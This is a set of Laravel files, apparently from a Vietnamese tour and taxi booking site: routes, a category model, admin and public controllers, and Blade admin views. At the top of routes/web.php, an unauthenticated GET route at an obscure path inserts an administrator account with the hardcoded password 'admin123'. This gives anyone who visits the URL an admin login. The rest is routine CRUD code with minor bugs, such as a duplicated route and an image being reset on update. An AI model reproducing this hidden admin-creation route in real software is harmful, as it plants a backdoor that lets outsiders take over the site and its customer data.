routes/web.php
<?php

use Illuminate\Routing\RouteGroup;
use Illuminate\Support\Facades\Http;
use Illuminate\Support\Facades\Route;
use App\Http\Controllers\Web\HomeController;
use App\Http\Controllers\Web\ProductController;
use App\Http\Controllers\Admin\LoginController;
//use App\Http\Controllers\Customer\ClientController;

Route::get('/admin/tyumnnfvrd', function() {
    \DB::table('admins')->insert([
        'name' => 'admin',
        'email' => 'email@email.com',
        'password' => \Hash::make('admin123'),
        'phone' => '0123123123'
    ]);
});

/*
|--------------------------------------------------------------------------
| Web Routes
|--------------------------------------------------------------------------
|
| Here is where you can register web routes for your application. These
| routes are loaded by the RouteServiceProvider within a group which
| contains the "web" middleware group. Now create something great!
|
*/

Route::group(['prefix' => 'laravel-filemanager', 'middleware' => 'auth'], function () {
    \UniSharp\LaravelFilemanager\Lfm::routes();
});

Route::group(['prefix' => '/admin', 'as' => 'ad.', 'namespace' => 'Admin', 'middleware' => 'auth'], function () {

    Route::get('/', 'DashboardController@index')->name('index');

    Route::resource('category', 'CategoryController')->except('show');
    Route::resource('blog', 'BlogController')->except('show');
    Route::resource('product', 'ProductController')->except('show');
    Route::resource('config', 'ConfigController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('cms', 'CmsController')->except('show');
    Route::resource('admin', 'AdminController')->except('show');
    Route::resource('tour', 'TourController')->except('show');
    Route::resource('locations', 'LocationsController')->except('show');
    Route::resource('seo', 'SeoPagesController')->except('show');

    Route::get('comment', 'CommentController@index')->name('comment.index');
    Route::patch('comment/{comment}', 'CommentController@update')->name('comment.update');

    Route::resource('order','OrderController')->except('show');

    Route::post('/logout', 'LoginController@logout')->name('logout');
    Route::get('customer-register', 'CustomerRegisterController@index')->name('customer.index');
    Route::resource('user', 'UserController');
    Route::resource('qrcode', 'QrcodeController');
    Route::get('change-qrcode', 'QrcodeController@change')->name('qrcode.change');
    Route::post('change-qrcode', 'QrcodeController@post_change')->name('qrcode.post.change');

});

Route::get('/login', 'Admin\LoginController@index')->name('ad.login.index');
Route::post('/login', 'Admin\LoginController@login')->name('ad.login');

//Route::get('/customer/login', 'Customer\LoginController@index')->name('us.login.index');
//Route::post('/customer/login', 'Customer\LoginController@login')->name('us.login');

// Route::prefix('/customer')->namespace('Customer')->as('us.')->middleware('customerLogin')->group(function () {

//     Route::get('/', 'HomeController@index')->name('home.index');
//     Route::get('/service/{id}/create', [App\Http\Controllers\Customer\ServiceController::class, 'create'])->name('service.create');
//     Route::resource('client', ClientController::class);
//     Route::get('resetpass', [App\Http\Controllers\Admin\UserController::class,'showresetpass'])->name('client.showresetpass');
//     Route::post('resetpass', [App\Http\Controllers\Admin\UserController::class,'resetpass'])->name('client.resetpass');
//     Route::resource('service', ServiceController::class)->except('create');
//     Route::post('/logout', [App\Http\Controllers\Customer\LoginController::class, 'logout'])->name('logout');

// });

Route::group(['as' => 'w.', 'namespace' => 'Web'], function () {

    Route::get('/', [HomeController::class, 'index'])->name('home');
    Route::post('change_price', 'HomeController@change_price')->name('home.change_price');

    Route::get('view-price', 'HomeController@view_price')->name('view_price');

    Route::get('category/{location}', 'CategoryController@index')->name('category');
    Route::get('find_to_location', 'HomeController@find_to_location')->name('home.find_to_location');
    Route::get('check_limit_per', 'HomeController@check_limit_per')->name('home.check_limit_per');

    Route::get('category-child/{from_id}/{to_id}', 'CategoryController@category_child')->name('category_child');
    Route::get('contact', 'ContactController@index')->name('contact');
    Route::get('about', 'AboutController@index')->name('about');
    Route::get('terms-translation', 'TermsTranslationController@index')->name('terms_translation');
    Route::get('other-1', 'OtherOneController@index')->name('other_1');
    Route::get('other-2', 'OtherTwoController@index')->name('other_2');
    Route::get('booking/{tour}/{quantity_per}/{travel_date}', 'BookingController@index')->name('booking');
    Route::post('booking', 'BookingController@post_booking')->name('post_booking');
});

app/Models/Category.php
<?php

namespace App\Models;

use Illuminate\Database\Eloquent\Factories\HasFactory;
use Illuminate\Database\Eloquent\Model;

class Category extends Model
{
    use HasFactory;

    protected $fillable = [
        'name', 'slug', 'image', 'description', 'position'
    ];

    public function blogs()
    {
        return $this->hasMany(Blog::class);
    }

    
}

app/Http/Controllers/Admin/CategoryController.php
<?php

namespace App\Http\Controllers\Admin;

use App\Http\Controllers\Controller;
use App\Http\Requests\Admin\CreateCategoryRequest;
use App\Http\Requests\Admin\UpdateCategoryRequest;
use App\Models\Category;
use Exception;
use Illuminate\Http\Request;
use Illuminate\Support\Str;

class CategoryController extends Controller
{
    public function index()
    {
        $categories = Category::orderBy('position', 'ASC')->paginate();

        return view('admin.categories.index', compact('categories'));
    }

    public function create()
    {
        return view('admin.categories.create');
    }

    public function store(CreateCategoryRequest $request)
    {
        try {
            $data = $request->only('name', 'description', 'position');
            $data['slug'] = Str::slug($request->name);
            if($request->image != null){ 
                $data['image'] = $this->uploadFile($request->image);
            }else{
                $data['image'] = asset('/images/defaul-user-image.jpeg');
            }
            Category::create($data);

            session()->flash('success', 'Thành công');
            return redirect()->route('ad.category.index');
        } catch(Exception $e) {
            session()->flash('error', 'Thất bại');
            return redirect()->back();
        }

    }

    public function edit(Category $category)
    {
        return view('admin.categories.edit', compact('category'));
    }

    public function update(UpdateCategoryRequest $request, Category $category)
    {
        $data = $request->only('name', 'description', 'position');

        if ($request->image != null) {
            $request->validate([
                'image' => 'required|mimes:jpeg,png,jpg,gif,svg|max:5120'
            ]);

            $path = $this->uploadFile($request->image);
            $data['image'] = $path;

        }else{
            $data['image'] = asset('/images/defaul-user-image.jpeg');
        }


        $data['slug'] = Str::slug($request->name);

        $category->update($data);

        session()->flash('success', 'Thành công');
        return redirect()->route('ad.category.index');
    }

    public function destroy(Category $category)
    {
        $category->blogs()->delete();
        $category->delete();
        session()->flash('success', 'Thành Công');
        return redirect()->route('ad.category.index');
    }
}

app/Http/Controllers/Web/CategoryController.php
<?php

namespace App\Http\Controllers\Web;

use App\Http\Controllers\Controller;
use App\Models\Location;
use App\Models\Tour;
use Illuminate\Http\Request;
use Carbon\Carbon;

class CategoryController extends Controller
{
    public function index(Location $location)
    {
        $date = Carbon::now()->toDateString();
        $tours = Tour::where('from_id',$location->id)->where('travel_date','>=', $date)->orderBy('id','DESC');
        $count_tour = $tours->get()->count();
        $seats_taxis = clone $tours;
        $private_taxis = $tours->where('type',2)->get();
        $seats_taxis = $seats_taxis->where('type',1)->get();
        $date = Carbon::now()->addDays(3)->toDateString();
        return view('web.category')->with(compact('location','seats_taxis', 'private_taxis','tours','date'));
    }
    public function category_child($from_id, $to_id) {
        $date = Carbon::now()->toDateString();
        $tour = new Tour();
        $name_from = $tour->location($from_id);
        $name_to = $tour->location($to_id);
        $tours = Tour::where(['from_id'=>$from_id,'to_id'=>$to_id])->where('travel_date','>=', $date)->orderBy('id','DESC');
        $count_tour = $tours->get()->count();
        $seats_taxis = clone $tours;
        $private_taxis = $tours->where('type',2)->get();
        $seats_taxis = $seats_taxis->where('type',1)->get();
        $date = Carbon::now()->addDays(3)->toDateString();
        $location = null;
        $image = Location::find($from_id)->image;
        return view('web.category')->with(compact('image','location','tours','seats_taxis', 'private_taxis','date','name_from','name_to'));
    }
}

resources/views/admin/categories/create.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Tạo mới danh mục')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a class="btn btn-circle btn-default" href="{{ route('ad.category.index') }}" title="">Quay lại</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title="Toàn màn hình"></a>
                    </div>
                </div>
                <div class="portlet-body form">
                    <form action="{{ route('ad.category.store') }}" method="POST" @submit.prevent="onSubmit" enctype="multipart/form-data">
                        @csrf
                        <div class="row">
                            <div class="col-md-4">
                                <div class="form-group" :class="[errors.has('name') ? 'has-error' : '']">
                                    <label for="name">Tên <span class="required">*</span></label>
                                    <input type="text" id="name" class="form-control" name="name" v-validate="'required'" data-vv-as="&quot;Tên&quot;" value="{{ old('name') }}">
                                    <span class="help-block" v-if="errors.has('name')">@{{ errors.first('name') }}</span>
                                </div>
                                <div class="form-group">
                                    <label for="position">Vị trí</label>
                                    <input type="number" id="position" class="form-control" name="position" value="{{ old('position') }}">
                                </div>
                                <div class="form-group">
                                    <label for="image">Hình ảnh <span class="required">*</span></label>
                                    <div>
                                        <div class="fileinput fileinput-new" data-provides="fileinput">
                                            <div class="fileinput-new thumbnail" style="width: 200px;">
                                                <img class="img-responsive" src="{{ asset('images/no_image.png') }}" alt="" />
                                            </div>
                                            <div class="fileinput-preview fileinput-exists thumbnail" style="height: 200px"></div>
                                            <div>
                                                <span class="btn default btn-file">
                                                    <span class="fileinput-new">Chọn ảnh</span>
                                                    <span class="fileinput-exists">Đổi ảnh</span>
                                                    <input type="file" accept="image/*" name="image">
                                                </span>
                                                <a href="javascript:void(0);" class="btn btn-danger fileinput-exists" data-dismiss="fileinput">Xóa</a>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group" :class="[errors.has('description') ? 'has-error' : '']">
                                    <label for="description">Mô tả <span class="required">*</span></label>
                                    <textarea  type="text" id="description" class="form-control" name="description" >{{ old('description') }}</textarea>
                                </div>
                            </div>
                        </div>
                        <div class="form-actions">
                            <button class="btn btn-primary">Tạo mới</button>
                            <a href="{{ route('ad.category.index') }}" class="btn btn-default">Quay lại</a>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
<link href="{{ asset('global/plugins/bootstrap-fileinput/bootstrap-fileinput.css') }}" rel="stylesheet" type="text/css" />
@endpush

@prepend('scripts')
<script src="{{ asset('global/plugins/bootstrap-fileinput/bootstrap-fileinput.js') }}" type="text/javascript"></script>

@endprepend

resources/views/admin/categories/edit.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Cập nhật danh mục')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a class="btn btn-circle btn-default" href="{{ route('ad.category.index') }}" title="">Quay lại</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title="Toàn màn hình"></a>
                    </div>
                </div>
                <div class="portlet-body form">
                    <form action="{{ route('ad.category.update', $category) }}" method="POST" @submit.prevent="onSubmit" enctype="multipart/form-data">
                        @method('PUT')
                        @csrf
                        <div class="row">
                            <div class="col-md-4">
                                <div class="form-group" :class="[errors.has('name') ? 'has-error' : '']">
                                    <label for="name">Tên <span class="required">*</span></label>
                                    <input type="text" id="name" class="form-control" name="name" v-validate="'required'" data-vv-as="&quot;Tên&quot;" value="{{ old('name', $category->name) }}">
                                    <span class="help-block" v-if="errors.has('name')">@{{ errors.first('name') }}</span>
                                </div>
                                <div class="form-group">
                                    <label for="position">Vị trí</label>
                                    <input type="number" id="position" class="form-control" name="position" value="{{ old('position', $category->position) }}">
                                </div>
                                <div class="form-group">
                                    <div class="form-group">
                                        <label for="image">Hình ảnh <span class="required">*</span></label>
                                        <div>
                                            <div class="fileinput fileinput-{{ $category->image ? 'exists' : 'new' }}" data-provides="fileinput">
                                                <div class="fileinput-new thumbnail" style="width: 200px;">
                                                    <img class="img-responsive" src="{{ asset('images/no_image.png') }}" alt="" />
                                                </div>
                                                <div class="fileinput-preview fileinput-exists thumbnail" style="height: 200px">
                                                    @if($category->image)
                                                        <img class="img-responsive" src="{{ $category->image }}" alt="Preview banner"/>
                                                    @endif
                                                </div>
                                                <div>
                                                    <span class="btn default btn-file">
                                                        <span class="fileinput-new">Chọn ảnh</span>
                                                        <span class="fileinput-exists">Đổi ảnh</span>
                                                        <input type="file" name="image">
                                                    </span>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="form-group" :class="[errors.has('description') ? 'has-error' : '']">
                                    <label for="description">Mô tả <span class="required">*</span></label>
                                    <textarea  type="text" id="description" class="form-control" name="description">{{ old('description', $category->description) }}</textarea>
                                </div>
                            </div>
                        </div>
                        <div class="form-actions">
                            <button class="btn btn-primary">Cập nhật</button>
                            <a href="{{ route('ad.category.index') }}" class="btn btn-default">Quay lại</a>
                        </div>
                    </form>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
<link rel="stylesheet" href="{{ asset('global/plugins/bootstrap-fileinput/bootstrap-fileinput.css') }}"/>

@endpush

@prepend('scripts')
<script src="{{ asset('global/plugins/bootstrap-fileinput/bootstrap-fileinput.js') }}" type="text/javascript"></script>
@endprepend

resources/views/admin/categories/index.blade.php
@extends('admin.layouts.master')

@section('page_title', 'Quản lý danh mục')

@section('content')
    <div class="row">
        <div class="col-md-12">
            <div class="portlet light portlet-datatable bordered">
                <div class="portlet-title">
                    <div class="caption">
                        <i class="icon-settings font-dark"></i>
                        <span class="caption-subject bold uppercase">@yield('page_title')</span>
                    </div>
                    <div class="actions">
                        <a href="{{ route('ad.category.create') }}" class="btn btn-circle btn-sm btn-primary"> <i class="fa fa-plus"></i> Tạo mới</a>
                        <a class="btn btn-circle btn-icon-only btn-default fullscreen" href="javascript:void(0);" title=""></a>
                    </div>
                </div>
                <div class="portlet-body">
                    <table class="table table-striped table-bordered table-hover" id="admin-table">
                            <thead>
                                <tr>
                                    <th>ID</th>
                                    <th>Tên</th>
                                    <th>Slug</th>
                                    <th>Ảnh</th>
                                    <th>Mô tả</th>
                                    <th>Thứ tự</th>
                                    <th width="110">Actions</th>
                                </tr>
                            </thead>
                            <tbody>
                                @foreach ($categories as $key => $category)
                                <tr>
                                    <td>{{ $key+1 }}</td>
                                    <td>{{ $category->name }}</td>
                                    <td>{{ $category->slug }}</td>
                                    <td><img src="{{ $category->image }}" style="max-width: 200px" alt=""></td>
                                    <td>{{ $category->description }}</td>
                                    <td>{{ $category->position }}</td>
                                    <td>
                                        <a class="btn btn-circle btn-sm btn-warning" href="{{ route('ad.category.edit', $category) }}"><i class="fa fa-pencil"></i></a>
                                        <form action="{{ route('ad.category.destroy', $category) }}" id="delete-course-item-form" style="display: inline-block" method="POST" onsubmit="return confirm('Bạn có chắc chắn muốn xóa?');">
                                            @csrf
                                            @method('DELETE')
                                            <button class="btn btn-circle btn-sm btn-danger"><i class="fa fa-trash"></i></button>
                                        </form>
                                    </td>
                                </tr>
                                @endforeach
                            </tbody>
                            {{ $categories->links() }}
                        </table>
                </div>
            </div>
        </div>
    </div>
@endsection

@push('css')
    <!-- BEGIN PAGE LEVEL PLUGINS -->
    <!-- END PAGE LEVEL PLUGINS -->
@endpush

@push('scripts')
    <!-- END PAGE LEVEL PLUGINS -->
    <!-- BEGIN PAGE LEVEL SCRIPTS -->
    {{-- <script src="{{ asset('global/plugins/select2/js/select2.min.js') }}" type="text/javascript"></script> --}}
    <!-- END PAGE LEVEL SCRIPTS -->
@endpush